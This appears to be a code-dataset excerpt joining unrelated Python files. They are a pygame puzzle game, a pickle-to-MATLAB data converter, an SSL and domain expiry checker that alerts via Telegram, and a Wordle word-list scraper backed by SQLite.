mousePosY = (mousePos[1]-self.WIN.get_height()/2)/self.size
gridX = mousePosX + self.cameraX
gridY = mousePosY + self.cameraY
gridX = round(gridX)
gridY = round(gridY)
if gridX > 0 and gridX < self.width-1 and gridY > 0 and gridY < self.height-1:
unoccupied = True
for player in self.players:
if gridX == player.x and gridY == player.y:
unoccupied = False
if unoccupied:
newPlayer = Player(self.playerIndex, " ", gridX, gridY, 0, self)
self.players.add(newPlayer)
self.setActivePlayer(newPlayer)
self.playerIndex += 1
def updateIndividual(self, object, shiftX, shiftY):
x = round(self.size*(object.x + shiftX))
y = round(self.size*(object.y + shiftY))
rect = object.image.get_rect(center = (x, y))
self.WIN.blit(object.image, rect)
def updateEditor(self):
screenCenterX = self.WIN.get_width()/(2*self.size)
screenCenterY = self.WIN.get_height()/(2*self.size)
shiftX = screenCenterX - self.cameraX
shiftY = screenCenterY - self.cameraY
for tile in self.tiles:
self.updateIndividual(tile, shiftX, shiftY)
for player in self.players:
self.updateIndividual(player, shiftX, shiftY)
self.updateIndividual(player.text, shiftX, shiftY)
self.WIN.blit(self.exitButton, self.exitButtonRect)
self.WIN.blit(self.restartButton, self.restartButtonRect)
self.WIN.blit(self.playButton, self.playButtonRect)
def convertLayoutToList(self):
self.tileRotations = [[" "]*self.width for i in range(self.height)]
for player in self.players:
if player.type == " ": player.type = "t"
self.tilePositions[player.y][player.x] = player.type
self.tileRotations[player.y][player.x] = str(int(player.rotation % 360 / 90))
self.layout = []
for row in range(self.height):
positionsRow = ""
rotationsRow = ""
for position in self.tilePositions[row]:
positionsRow += position
for rotation in self.tileRotations[row]:
rotationsRow += rotation
rowData = [positionsRow, rotationsRow]
self.layout.append(rowData)
```
#### File: puzzle_game/Game/player.py
```python
import pygame
import math
from text import Text
class Player(pygame.sprite.Sprite):
def __init__(self, index, type, x, y, rotation, level):
super().__init__()
self.index = index
self.type = type
self.x = x
self.y = y
self.rotation = rotation
self.size = level.size
self.level = level
self.original_image = pygame.Surface((self.size, self.size)).convert_alpha()
self.original_image.fill("white")
self.image = pygame.transform.rotate(self.original_image, self.rotation)
self.text = Text(type, x, y, level.font)
self.instruction = 0
self.direction = 1
self.jumpDirection = 1
self.walkFrames = 30
self.walkRotation = 0
self.fallFrames = 18
self.jumpFrames = 24
self.jumpedDist = 0
self.cornerLeeway = 0.2
self.triedDirections = []
# def updateSize(self, size):
# self.size = size
# self.image = pygame.transform.scale(self.image, (size, size))
def doMovement(self):
if self.instruction == 0 and self.level.playerChangeCooldown == 0:
self.checkInputs()
#if a movement has just been initiated, remove the player from its previous position
if self.instruction != 0:
self.level.playerPositionIndecies[round(self.y)][round(self.x)] = None
self.level.playerPositionSymbols[round(self.y)][round(self.x)] = None
if self.instruction == 1:
self.fall()
if self.instruction == 2:
self.walk()
if self.instruction == 3:
self.jump()
self.triedDirections.clear()
self.text.x = self.x
self.text.y = self.y
self.updateRotation()
def updateRotation(self):
self.text.image = pygame.transform.rotate(self.text.original_image, self.rotation)
self.image = pygame.transform.rotate(self.original_image, self.rotation)
def checkInputs(self):
keys = pygame.key.get_pressed()
if 1 not in self.triedDirections:
self.instruction = 1
self.triedDirections.append(1)
elif keys[pygame.K_a] and [2, -1] not in self.triedDirections:
self.instruction = 2
self.direction = -1
self.walkRotation = self.rotation % 90 + 45
self.triedDirections.append([2, -1])
elif keys[pygame.K_d] and [2, 1] not in self.triedDirections:
self.instruction = 2
self.direction = 1
self.walkRotation = self.rotation % 90 + 135
self.triedDirections.append([2, 1])
elif keys[pygame.K_q] and [3, -1] not in self.triedDirections:
self.instruction = 3
self.direction = -1
self.jumpedDist = 0
self.jumpDirection = 1
self.triedDirections.append([3, -1])
elif keys[pygame.K_e] and [3, 1] not in self.triedDirections:
self.instruction = 3
self.direction = 1
self.jumpedDist = 0
self.jumpDirection = 1
self.triedDirections.append([3, 1])
elif keys[pygame.K_w]:
shift = 1
self.level.changePlayer(shift)
elif keys[pygame.K_s]:
shift = -1
self.level.changePlayer(shift)
def movementEnd(self):
self.instruction = 0
self.x = round(self.x*self.size)/self.size
self.y = round(self.y*self.size)/self.size
self.level.playerPositionIndecies[round(self.y)][round(self.x)] = self.index
self.level.playerPositionSymbols[round(self.y)][round(self.x)] = self.type
self.doMovement()
def fall(self):
self.y += 1/self.fallFrames
if self.level.collision(self):
self.y -= 1/self.fallFrames
self.movementEnd()
def walk(self):
self.walkMovement(90/self.walkFrames)
if self.level.collision(self):
change = self.rotation % 90
if change > 45: change -= 90
else: change = -change
self.walkMovement(change)
self.movementEnd()
def walkMovement(self, change):
previousRotation = self.walkRotation
self.walkRotation -= self.direction * change
self.rotation -= self.direction * change
self.x += math.sqrt(2)/2*(math.cos(self.walkRotation*math.pi/180) - math.cos(previousRotation*math.pi/180))
self.y -= math.sqrt(2)/2*(math.sin(self.walkRotation*math.pi/180) - math.sin(previousRotation*math.pi/180))
self.image = pygame.transform.rotate(self.original_image, self.rotation)
def jump(self):
self.jumpMovement(self.jumpDirection/self.jumpFrames)
if self.level.collision(self):
self.jumpMovement(-self.jumpDirection/self.jumpFrames)
if self.rotation % 90 == 0:
self.jumpedDist = 0
self.movementEnd()
else:
angle = 135 - self.rotation % 90
cornerX = self.x + math.sqrt(2)/2*(math.cos(angle*math.pi/180))
cornerY = self.y + math.sqrt(2)/2*(math.sin(angle*math.pi/180))
if cornerX % 1 < 0.5 + self.cornerLeeway and cornerX % 1 > 0.5 - self.cornerLeeway and cornerY % 1 < 0.5 + self.cornerLeeway and cornerY % 1 > 0.5 - self.cornerLeeway:
self.instruction = 2
self.jumpedDist = 0
self.walkRotation = self.rotation % 90 + 45
cornerX = round(cornerX-0.5)+0.5
cornerY = round(cornerY-0.5)+0.5
self.x = cornerX - math.sqrt(2)/2*(math.cos(angle*math.pi/180))
self.y = cornerY - math.sqrt(2)/2*(math.sin(angle*math.pi/180))
else:
self.instruction = 3
self.jumpDirection = -1
self.doMovement()
def jumpMovement(self, change):
self.x += self.direction * change
self.y += (2/3)*(((self.jumpedDist+change)*(self.jumpedDist+change)-4*(self.jumpedDist+change)) - (self.jumpedDist*self.jumpedDist-4*self.jumpedDist))
self.jumpedDist += change
self.rotation -= self.direction * 90 * change
self.image = pygame.transform.rotate(self.original_image, self.rotation)
``` |
{
"source": "5igno/oedus",
"score": 3
} |
#### File: Measurements/Save Data/Pickle2Workspace.py
```python
import sys
import pickle
import copy
import scipy.io as sio
""" Picke2Workspace Function """
def Pickle2Workspace(pmat_filepath):
pmat_file_handle = open(pmat_filepath,'r')
workspace = pickle.load(pmat_file_handle)
pmat_file_handle.close()
# Define new file path
mat_filepath = pmat_filepath[0:-6]
fileName = workspace.keys()[0]
content = workspace[fileName].keys()
if 'StressSequence' in content:
"""
Reorder Stress Sequence in Buffer so that Instrument Sequence step is
the first index and the Stress step is the second one
"""
# Define New data types
newWorkspace = {fileName:{}}
emptyInstrumentSequence = {'StressSequence':[]}
# Copy the device information
if 'DeviceInfo' in content:
newWorkspace[fileName]['DeviceInfo'] = workspace[fileName]['DeviceInfo']
# Extract the StressSequence
stressSequence = workspace[fileName]['StressSequence']
newInstrumentSequence = []
#For each step of the stress sequence
for stressStep in stressSequence:
#get the set of measurements done
instrumentSequence = stressStep['InstrumentSequence']
# and with each measurement (index needed)
for id_measurement in range(0,len(instrumentSequence)):
measurement = instrumentSequence[id_measurement].copy()
# add the motor position information
measurement['MotorPosition'] = stressStep['MotorPosition']
#If there no element in the list for this measurement
if id_measurement >= len(newInstrumentSequence):
# just create an empty one
newInstrumentSequence.append({'StressSequence':[]})
#and store in the new array of measurements
newInstrumentSequence[id_measurement]['StressSequence'].append(measurement.copy())
'''
#some debugging stuff
print 'Instrument Sequence Length: '+str(len(instrumentSequence))
print 'Measurement Index: '+str(id_measurement)
print 'New Instrument Sequence Length: '+str(len(newInstrumentSequence[id_measurement]['StressSequence']))
#print 'Empty Instrument Sequence: '+str(len(emptyInstrumentSequence['StressSequence']))
raw_input()
'''
# Now store everything in a new workspace
newWorkspace[fileName]['InstrumentSequence'] = newInstrumentSequence
# Save to file
sio.savemat(mat_filepath,newWorkspace)
else:
# No StressSequence = No transformation to do: just save what you have
sio.savemat(mat_filepath,workspace)
return
""" Main program """
pmat_filepath = ''
arglist = sys.argv[1:]
for ix in range(len(arglist)):
pmat_filepath = pmat_filepath + arglist[ix] + ' '
print "Converting Picked Workspace to Workspace file"
print "File path: "+pmat_filepath
Pickle2Workspace(pmat_filepath)
```
#### File: Measurements/Save Data/Test_Python2Matlab_Builtin.py
```python
import scipy.io as sio
import numpy as np
#Define the some configuration strings for HP and switching matrix
parameter_analyzer_configuration = 'insert here the configuration of the parameter analyzer'
switching_matrix_configuration = 'insert here the configuration of the switching matrix'
device_info_string = 'insert here the information about the device under test'
#Define trail vectors for current and voltage
""" With Built-in data types: tuples """
tpl_array = tuple([float(x) for x in tuple(range(1,11))])
matrix = (tpl_array,tpl_array,tpl_array,tpl_array)
destination_path = "struct_test.mat"
# Lists and tuples are imported in the same way, as an array
class MeasurementStep:
def ConfigParameterAnalyzer(configuration):
""" Creates a field for the parameter analyzer configuration """
parameter_analyzer = configuration
def ConfigSwitchingMatrix(configuration):
""" Creates a field for the switching matrix configuration """
switching_matrix = configuration
def SetElectricalMeasurement(current_traces,voltage_traces):
""" creates or updates the current and voltage measurement fields """
current = current_traces
voltage = voltage_traces
x = MeasurementStep
type_instrument_sequence = [('parameter_analyzer','O'),('switching_matrix','O'),
('current','O'), ('voltage','O')]
instrument_sequence = np.zeros(2,dtype = type_instrument_sequence)
# Fillup the instrument_sequence
for id_isnt in range(len(instrument_sequence)):
instrument_sequence[id_isnt]['parameter_analyzer'] = str(id_isnt) + parameter_analyzer_configuration
instrument_sequence[id_isnt]['switching_matrix'] = str(id_isnt) + parameter_analyzer_configuration
instrument_sequence[id_isnt]['current'] = np.array(zip(*current)) # zip(* == transposed
instrument_sequence[id_isnt]['voltage'] = np.array(zip(*voltage)) #
type_stress_sequence = [('motor_position',np.float64),('instrument_sequence',np.object)]
stress_sequence = np.zeros(3,dtype = type_stress_sequence)
# Fillup the stress_sequence
for id_stress in range(len(stress_sequence)):
stress_sequence[id_stress]['instrument_sequence'] = instrument_sequence
stress_sequence[id_stress]['motor_position'] = id_stress
measurement = {'device_info':device_info_string,'stress_sequence':stress_sequence}
# workspace = {'device_info':device_info_string,'measurement':measurement}
workspace = {'device_info':device_info_string,'instrument_sequence':instrument_sequence,'stress_sequence':stress_sequence,'measurement':measurement}
workspace = {'measurement':measurement}
sio.savemat(destination_path,workspace)
#return sio.savemat(destination_path,workspace)
""" Would be nice to place the instrument_sequence array and the device_info_string
into a single structure to save as workspace """
#type_measurement = [('instrument_sequence',type_instrument_sequence),
# ('device_info','O')]
#
#
#measurement = np.zeros(1,dtype = type_measurement)
#
#measurement['instrument_sequence'] = instrument_sequence
#measurement['device_info'] = device_info_string
#
#workspace = {'device_info':device_info_string,
# 'instrument_sequence':instrument_sequence,
# 'measurement':measurement}
#
#sio.savemat("C:\Users\gio\Desktop\struct_test.mat",workspace)
import sys
sys,path.insert(1, 'C:\\Python27\\lib\\site-packages\\IPython\\extensions')
``` |
{
"source": "5iyxxf/codex-team",
"score": 2
} |
#### File: 5iyxxf/codex-team/main.py
```python
import socket
import ssl
import datetime
import requests
import sys
import whois
from config import DOMAINS, DAYS_LIMIT_CERT, DAYS_LIMIT_DOMAIN, APITOKEN, CHATID
date_fmt = r'%b %d %H:%M:%S %Y %Z'
MESSAGE_CERTIFICATE_EXPIRED = "⚠️ SSL expired on {}"
MESSAGE_HOSTNAME_MISMATCH = "⚠️ SSL hostname mismatch on {}"
MESSAGE_EXCEPTION = "⚠️ SSL exception on {}: {}"
def send_message(text):
"""
Send message to the Telegram via API
:param text: message
"""
url = 'https://api.telegram.org/bot{}/sendMessage'.format(APITOKEN)
data = {
'text': text,
'chat_id': CHATID,
'disable_web_page_preview': True
}
requests.post(url, json=data)
def ssl_expiry_datetime(hostname):
"""
Get SSL expiration date
Source link: https://serverlesscode.com/post/ssl-expiration-alerts-with-lambda/
:param hostname: hostname
:return datetime object or None
"""
context = ssl.create_default_context()
conn = context.wrap_socket(
socket.socket(socket.AF_INET),
server_hostname=hostname,
)
# 3 second timeout because Lambda has runtime limitations
conn.settimeout(3.0)
try:
conn.connect((hostname, 443))
ssl_info = conn.getpeercert()
except ssl.SSLError as e:
if e.verify_code == 10:
send_message(MESSAGE_CERTIFICATE_EXPIRED.format(hostname))
elif e.verify_code == 62:
send_message(MESSAGE_HOSTNAME_MISMATCH.format(hostname))
else:
send_message(MESSAGE_EXCEPTION.format(hostname, e.verify_message))
return None
# Parse the string from the certificate into a Python datetime object
return datetime.datetime.strptime(ssl_info['notAfter'], date_fmt)
def check_ssl_time_left(domain):
"""
Count days left and generate a warning message
:param domain: domain
:return:
"""
cert_expire_at = ssl_expiry_datetime(domain)
if cert_expire_at is not None:
time_left = cert_expire_at - datetime.datetime.now()
message = 'SSL cert for {} has {}'.format(domain, days_left_to_format_string(time_left))
if time_left.days <= DAYS_LIMIT_CERT:
message = '{}'.format(message)
send_message(message)
print(message)
def days_left_to_format_string(timedelta):
"""
Calculate days left from timedelta and return string message
:param timedelta: timedelta object
:return: string message with the days left
"""
return '{} day{} left'.format(timedelta.days, ('s', '')[timedelta.days == 1])
if not APITOKEN:
print('No APITOKEN was found in config file.')
exit()
for domain in DOMAINS:
try:
check_ssl_time_left(domain)
w = whois.whois(domain)
expdays = 'Expiration date for {} has {}'.format(domain, days_left_to_format_string(w.expiration_date-datetime.datetime.now()))
print(expdays)
if (w.expiration_date-datetime.datetime.now()).days <= DAYS_LIMIT_DOMAIN:
send_message(w.expiration_date)
except Exception as e:
print("Unexpected error:", e)
``` |
{
"source": "5j54d93/Google-Hardware-Product-Sprint",
"score": 3
} |
#### File: Google-Hardware-Product-Sprint/bump/Bump.py
```python
from temperature_humidity.SHT31D import SHT31D
from datetime import datetime
import RPi.GPIO as GPIO
import time
class Bump:
def __init__(self):
GPIO.setmode(GPIO.BCM)
self.RELAY = 24
GPIO.setup(self.RELAY, GPIO.OUT)
self.SHT31D = SHT31D()
self.last_watering_month = 0
self.last_watering_day = 0
self.last_watering_hour = 0
self.last_watering_min = 0
def last_watering_time(self):
if self.last_watering_hour == 0 and self.last_watering_min == 0 : return "未澆過水"
return str(self.last_watering_month) + '/' + str(self.last_watering_day) + ' ' + str(self.last_watering_hour).zfill(2) + ':' + str(self.last_watering_min).zfill(2)
def upon_last_watering_time(self):
if self.last_watering_hour == 0 and self.last_watering_min == 0 : return "未澆過水"
return str(datetime.now().hour * 60 + datetime.now().minute - self.last_watering_hour * 60 - self.last_watering_min)
def update_last_watering_time(self):
self.last_watering_month = datetime.now().month
self.last_watering_day = datetime.now().day
self.last_watering_hour = datetime.now().hour
self.last_watering_min = datetime.now().minute
def watering(self):
GPIO.output(self.RELAY, GPIO.LOW)
time.sleep(3)
GPIO.output(self.RELAY, GPIO.HIGH)
self.update_last_watering_time()
def auto_watering(self):
if self.SHT31D.dry_or_wet_plant() == "It's dry for plants!" :
if self.upon_last_watering_time() == "Haven't watering yet." or self.upon_last_watering_time() >= '720' :
self.watering()
self.update_last_watering_time()
``` |
{
"source": "5jjCopter/navio-stacion",
"score": 3
} |
#### File: navio-stacion/drone/beacon.py
```python
import time
import socket
from urllib import request
class Beacon():
sock = None
def __init__(self, host, port, spec_ip=None):
self.given_ip = spec_ip
self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.sock.connect((host, port))
def send(self, message):
self.sock.sendall(bytes(message, 'utf-8'))
def read(self):
return str(self.sock.recv(1024), 'utf-8')
def ping(self):
message = request.urlopen('http://ipinfo.io/ip').read().decode('utf-8')[:-1]
if self.given_ip:
return self.send(self.given_ip)
else:
return self.send(message)
def close(self):
self.sock.close()
self.sock = None
if __name__ == '__main__':
GCS_IP = '172.16.58.3'
GCS_PORT = 9999
while 1:
time.sleep(10)
beacon_station = Beacon(GCS_IP, GCS_PORT, '192.168.100.147')
beacon_station.ping()
beacon_station.close()
``` |
{
"source": "5joon2/algorithm_programmers",
"score": 3
} |
#### File: algorithm_programmers/lv3/express_N.py
```python
def solution(N, number):
dp = []
answer = -1
for i in range(0, 8):
tmp = []
print('dp: ', dp)
for j in range(0, i):
for k in dp[j]:
print('i, j: ', i, j)
for l in dp[i-j-1]:
mul = k * l
if l > 0:
div = k // l if k // l > 0 else None
add = k + l
sub = k - l if k - l >= 0 else None
if div is not None:
tmp.append(div)
if sub is not None:
tmp.append(sub)
tmp.append(add)
tmp.append(mul)
tmp.append(int(str(N) * (i+1)))
if number in tmp:
answer = i+1
break
dp.append(list(set(tmp)))
return answer
# 테스트 1 〉 통과 (0.78ms, 10.5MB)
# 테스트 2 〉 통과 (0.03ms, 10.4MB)
# 테스트 3 〉 통과 (0.04ms, 10.4MB)
# 테스트 4 〉 통과 (13.87ms, 12.4MB)
# 테스트 5 〉 통과 (8.11ms, 11.6MB)
# 테스트 6 〉 통과 (0.21ms, 10.4MB)
# 테스트 7 〉 통과 (0.22ms, 10.4MB)
# 테스트 8 〉 통과 (11.26ms, 11.9MB)
# 테스트 9 〉 통과 (0.02ms, 10.4MB)
```
#### File: algorithm_programmers/lv3/jewel_shopping.py
```python
from collections import defaultdict
def solution(gems):
gems_dict = defaultdict(int)
gems_num = len(set(gems))
gems_candidate_num = len(gems)
left = 0
right = 0
last_min = 99999999999
answer = []
while right < gems_candidate_num:
gems_dict[gems[right]] += 1
right += 1
if len(gems_dict) == gems_num:
while left < right:
if gems_dict[gems[left]] <= 1:
break
gems_dict[gems[left]] -= 1
left += 1
if last_min > right - left:
last_min = right - left
answer = [left+1, right]
return answer
# ["AA", "AB", "AC", "AA", "AC"]
# 테스트 1 〉 통과 (0.02ms, 10.2MB)
# 테스트 2 〉 통과 (0.09ms, 10.4MB)
# 테스트 3 〉 통과 (0.16ms, 10.2MB)
# 테스트 4 〉 통과 (0.20ms, 10.3MB)
# 테스트 5 〉 통과 (0.25ms, 10.2MB)
# 테스트 6 〉 통과 (0.01ms, 10.2MB)
# 테스트 7 〉 통과 (0.01ms, 10.2MB)
# 테스트 8 〉 통과 (0.28ms, 10.3MB)
# 테스트 9 〉 통과 (0.64ms, 10.3MB)
# 테스트 10 〉 통과 (0.32ms, 10.3MB)
# 테스트 11 〉 통과 (0.47ms, 10.4MB)
# 테스트 12 〉 통과 (0.67ms, 10.3MB)
# 테스트 13 〉 통과 (1.03ms, 10.4MB)
# 테스트 14 〉 통과 (0.84ms, 10.4MB)
# 테스트 15 〉 통과 (2.05ms, 10.5MB)
# 효율성 테스트
# 테스트 1 〉 통과 (2.94ms, 10.6MB)
# 테스트 2 〉 통과 (3.31ms, 10.6MB)
# 테스트 3 〉 통과 (7.37ms, 11.2MB)
# 테스트 4 〉 통과 (6.91ms, 12MB)
# 테스트 5 〉 통과 (13.54ms, 12MB)
# 테스트 6 〉 통과 (15.81ms, 12.3MB)
# 테스트 7 〉 통과 (19.37ms, 12.7MB)
# 테스트 8 〉 통과 (19.43ms, 12.8MB)
# 테스트 9 〉 통과 (21.53ms, 13.5MB)
# 테스트 10 〉 통과 (29.01ms, 14.1MB)
# 테스트 11 〉 통과 (32.42ms, 14.8MB)
# 테스트 12 〉 통과 (22.82ms, 15.5MB)
# 테스트 13 〉 통과 (31.38ms, 16.4MB)
# 테스트 14 〉 통과 (48.72ms, 17.1MB)
# 테스트 15 〉 통과 (45.13ms, 17.8MB)
```
#### File: algorithm_programmers/lv3/table_edit.py
```python
class Node:
def __init__(self, item=None, state=True):
self.data = item
self.left = None
self.right = None
class DLL:
def __init__(self):
self.head = Node()
self.tail = Node()
self.head.right = self.tail
self.head.left = self.head
self.tail.right = self.tail
self.tail.left = self.head
self.pointer = self.head # point head at first
self.stack = []
def insert(self, node):
self.pointer.right = node
node.left = self.pointer
node.right = self.tail
self.pointer = node
def move(self, command, n):
if command == 'U':
while n:
if self.pointer.left != self.head:
n -= 1
self.pointer = self.pointer.left
elif self.pointer.left == self.head:
break
elif command == 'D':
while n:
if self.pointer.right != self.tail:
n -= 1
self.pointer = self.pointer.right
elif self.pointer.right == self.tail:
break
def remove(self):
self.pointer.state = False
self.pointer.left.right = self.pointer.right
self.pointer.right.left = self.pointer.left
self.stack.append(self.pointer)
if self.pointer.right == self.tail:
self.pointer = self.pointer.left
else:
self.pointer = self.pointer.right
def recover(self):
recover_node = self.stack.pop(-1)
recover_node.state = True
recover_node.left.right = recover_node
recover_node.right.left = recover_node
def set_pointer(self, n):
cur = self.head
while n+1:
self.pointer = cur.right
n -= 1
cur = cur.right
def solution(n, k, cmd):
answer = ['X']*n
dll = DLL()
for i in range(n):
node = Node(item=str(i), state=True)
dll.insert(node)
dll.set_pointer(k)
for command in cmd:
commands = command.split()
if len(commands) > 1:
if commands[0] == 'U' or commands[0] == 'D':
dll.move(commands[0], int(commands[1]))
elif commands[0] == 'C':
dll.remove()
elif commands[0] == 'Z':
dll.recover()
cur = dll.head
while cur.right != dll.tail:
answer[int(cur.right.data)] = 'O'
cur = cur.right
return ''.join(answer)
# 효율성 테스트
# 테스트 1 〉 통과 (2285.82ms, 238MB)
# 테스트 2 〉 통과 (2395.20ms, 238MB)
# 테스트 3 〉 통과 (2337.52ms, 238MB)
# 테스트 4 〉 통과 (2036.60ms, 244MB)
# 테스트 5 〉 통과 (2300.08ms, 244MB)
# 테스트 6 〉 통과 (1965.71ms, 244MB)
# 테스트 7 〉 통과 (481.87ms, 61.7MB)
# 테스트 8 〉 통과 (575.42ms, 75.7MB)
# 테스트 9 〉 통과 (2289.19ms, 245MB)
# 테스트 10 〉 통과 (2157.53ms, 245MB)
``` |
{
"source": "5kamis52/com714-SolentCampers",
"score": 3
} |
#### File: 5kamis52/com714-SolentCampers/classCamper.py
```python
from enums import CamperType
import csv
import os
class Camper:
def __init__(self, id, size):
self.id = id
for e in CamperType:
if e.name == size:
size = e.value
break
self.size = size
def writeCamperData(self):
header = ['id', 'type']
if os.path.isfile('data/campers.csv'):
f = open('data/campers.csv', 'a', newline='', encoding='utf-8')
writer = csv.writer(f)
writer.writerow([self.id, self.size])
f.close()
else:
f = open('data/campers.csv', 'w', newline='', encoding='utf-8')
writer = csv.writer(f)
writer.writerow(header)
writer.writerow([self.id, self.size])
f.close()
```
#### File: 5kamis52/com714-SolentCampers/tkAdmin.py
```python
import tkinter as tk
import tkinter.messagebox
from enums import CamperType, CampRegion
import random
import classCamp, classCamper
class AdminWindow:
def __init__(self, root):
self.window = tk.Toplevel(root)
self.window.grab_set()
self.displayHeader()
self.displayCampSiteForm()
self.displayCamperVanForm()
self.window.title('Administrator - Solent Campers')
self.window.geometry("400x350+450+100")
def displayHeader(self):
headFrame = tk.Frame(self.window, width=400, height=100)
headFrame.pack(side=tk.TOP, pady=(10,20))
label1 = tk.Label(headFrame, text="Welcome To Solent Camper!")
label1.pack(side=tk.TOP)
label2 = tk.Label(headFrame, text="As Administrator, You Can Add Camps and Vans..")
label2.pack(side=tk.TOP)
def displayCampSiteForm(self):
campFrame = tk.Frame(self.window, width=400, height=120, bg='blue')
campFrame.pack(side=tk.TOP, pady=(10,20))
campFrame.pack_propagate(0)
topFrame = tk.Frame(campFrame, width=400, height=30)
topFrame.pack(side=tk.TOP)
topFrame.pack_propagate(0)
label1 = tk.Label(topFrame, text="Add a Camp Site.")
label1.pack(side=tk.LEFT, padx=(10,0))
middleFrame = tk.Frame(campFrame, width=400, height=90)
middleFrame.pack(side=tk.TOP)
middleFrame.pack_propagate(0)
self.campName = tk.StringVar()
self.campName.set("")
self.campNameField = tk.Entry(middleFrame, textvariable=self.campName)
self.campNameField.pack(side=tk.TOP, pady=(00,5))
self.region = tk.StringVar()
self.region.set(CampRegion.RegionA.name)
self.campRegionField = tk.OptionMenu(middleFrame, self.region, *[e.name for e in CampRegion])
self.campRegionField.pack(side=tk.TOP, pady=(0,5))
button = tk.Button(middleFrame, text="Add New Site", height=1, width=15, command=self.saveCamp)
button.pack(side=tk.TOP)
def displayCamperVanForm(self):
camperFrame = tk.Frame(self.window, width=400, height=100, bg='green')
camperFrame.pack(side=tk.TOP, pady=(10,20))
topFrame = tk.Frame(camperFrame, width=400, height=30)
topFrame.pack(side=tk.TOP)
topFrame.pack_propagate(0)
label1 = tk.Label(topFrame, text="Add a Camper Van.")
label1.pack(side=tk.LEFT, padx=(10,0))
middleFrame = tk.Frame(camperFrame, width=400, height=70)
middleFrame.pack(side=tk.TOP)
middleFrame.pack_propagate(0)
self.vanType = tk.StringVar()
self.vanType.set(CamperType.Small.name)
self.camperTypeField = tk.OptionMenu(middleFrame, self.vanType, *[e.name for e in CamperType])
self.camperTypeField.pack(side=tk.TOP, pady=(0,10))
button = tk.Button(middleFrame, text="Add New Van", height=1, width=15, command=self.saveVan)
button.pack(side=tk.TOP)
def saveVan(self):
camperID = random.randint(100,999)
newCamper = classCamper.Camper(camperID, self.vanType.get())
newCamper.writeCamperData()
tkinter.messagebox.showinfo(master=self.window, title="Van Added", message="Camper Van added with ID " + str(camperID) )
def saveCamp(self):
if self.campName.get() == "":
tkinter.messagebox.showerror(master=self.window, title="Missing Value", message="Camp Name Can't be Empty")
return
campID = random.randint(100,999)
newCamp = classCamp.Camp(campID, self.campName.get(), self.region.get())
newCamp.writeCampData()
tkinter.messagebox.showinfo(master=self.window, title="Camp Site Added", message="Camp "+self.campName.get()+" added to " + self.region.get() )
``` |
{
"source": "5kdn/WordleDict",
"score": 3
} |
#### File: app/app/DBController.py
```python
import os
import re
import sqlite3
import urllib.request
import urllib.parse
import urllib.error
from typing import List, Dict, Tuple, Any
from bs4 import BeautifulSoup
class DBController(object):
"""データベースコントローラ"""
__base_url = 'https://www.nytimes.com/games/wordle/'
__headers = {"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0"}
def __init__(self, dbpath: str = './dict.sqlite') -> None:
"""constructor
DBに接続する。
DBが無ければ作成し、Wordleから単語群を取得する。
Args:
dbpath (str, optional): path to database. Defaults to './dict.sqlite'.
"""
_is_create_DB = False
self.__dbpath = dbpath
if not os.path.isfile(dbpath):
_is_create_DB = True
self._create_db()
if _is_create_DB:
self.update_db()
def _create_db(self) -> None:
"""Create DB and table.
"""
with sqlite3.connect(self.__dbpath) as conn:
cur = conn.cursor()
queue = """\
CREATE TABLE words(
id INTEGER PRIMARY KEY AUTOINCREMENT,
word TEXT UNIQUE NOT NULL
);"""
cur.execute(queue)
queue = """\
CREATE TABLE jsversion(
id INTEGER PRIMARY KEY AUTOINCREMENT,
version TEXT NOT NULL,
date TIMESTAMP DEFAULT(STRFTIME('%Y-%m-%d', DATETIME('now','localtime')))
)"""
cur.execute(queue)
conn.commit()
cur.close()
def search_words(
self,
in_: List[str] = [],
in_not_position: List[Dict[str, List[int]]] = [],
notin: List[str] = [],
fixed: str = '') -> List[Any]:
"""DBから条件にあった単語を探す.
Args:
in_ (List[str], optional): 単語中に含むことが確定しているアルファベットのリスト (黄). Defaults to [].
in_not_position (List[Dict[str, List[int]]], optional): 単語中に含むことが確定しているアルファベットが入らない場所. Defaults to [].
notin (List[str], optional): 単語中に含まないアルファベットのリスト (灰色). Defaults to [].
fixed (str, optional): 位置を固定するアルファベットのリスト(LIKE方式) (緑). Defaults to ''.
Raises:
Exception: エラー
Returns:
List[Any]: 条件に一致した単語.
"""
# 入力のチェック
if type(in_) == list and len(in_) > 5:
raise Exception
if type(in_not_position) == list and len(in_) > 5:
raise Exception
if type(notin) == list and len(notin) > 26:
raise Exception
if type(fixed) == str and len(fixed) > 5:
raise Exception
subquery: List[str] = []
arg: List[str] = []
# not in
if len(notin) > 0:
subquery.append(' word NOT GLOB ?')
arg.append(f'*[{"".join(notin)}]*')
# in
for i in in_:
if len(i) != 1 and type(i) == str:
raise Exception
subquery.append(' word LIKE ?')
arg.append(f'%{i}%')
# fixed position
if len(fixed) > 0:
subquery.append(f' word LIKE ?')
arg.append(fixed)
# generate query
query: str = f'SELECT word FROM words'
if len(subquery) > 0:
query += " WHERE"
for i, q in enumerate(subquery):
prefix: str = ''
if i != 0:
prefix = ' AND'
query += prefix + q
query += ' ORDER BY word ASC'
ret: List[Any] = []
with sqlite3.connect(self.__dbpath) as conn:
cur = conn.cursor()
ret = [r for (r,) in cur.execute(query, tuple(arg)).fetchall()]
if ret == None:
ret = []
return ret
def _get_new_wordlist(self, js_url: str) -> Dict[str, Tuple[str]]:
"""jsファイルからワードリストを抽出する
Args:
js_url (str): jsファイルのurl(main.[hash].js)
Raises:
Exception: _description_
Returns:
Dict[str, Tuple[str]]:
'in': 正解が含まれる単語のリスト
'not_in': 正解が含まれないが入力が許可されている単語のリスト
"""
r_in = re.compile(r'\[(\"(?:[a-z]{5})\",?){1000,5000}\]')
r_notin = re.compile(r'\[(\"(?:[a-z]{5})\",?){5001,20000}\]')
req = urllib.request.Request(js_url, headers=self.__headers)
with urllib.request.urlopen(req) as res:
body = res.read().decode('utf-8')
list_in = r_in.search(body)
list_notin = r_notin.search(body)
if list_in is None or list_notin is None:
raise Exception('listがNone')
in_ = tuple(sorted(list_in.group()[2:-2].split('","')))
not_in = tuple(sorted(list_notin.group()[2:-2].split('","')))
return {'in': in_, 'not_in': not_in}
def _get_js_name(self) -> str:
"""Wordleからjavascriptのファイル名を取得する.
Raises:
Exception:
Returns:
str: file name of Wordle's javascript.
"""
soup = None
req = urllib.request.Request(self.__base_url, headers=self.__headers)
with urllib.request.urlopen(req) as res:
soup = BeautifulSoup(res, 'html.parser')
js_elem = soup.select_one("body > script:nth-of-type(2)")
if js_elem is None:
raise Exception
ret = js_elem['src']
if type(ret) is not str:
raise Exception
return ret
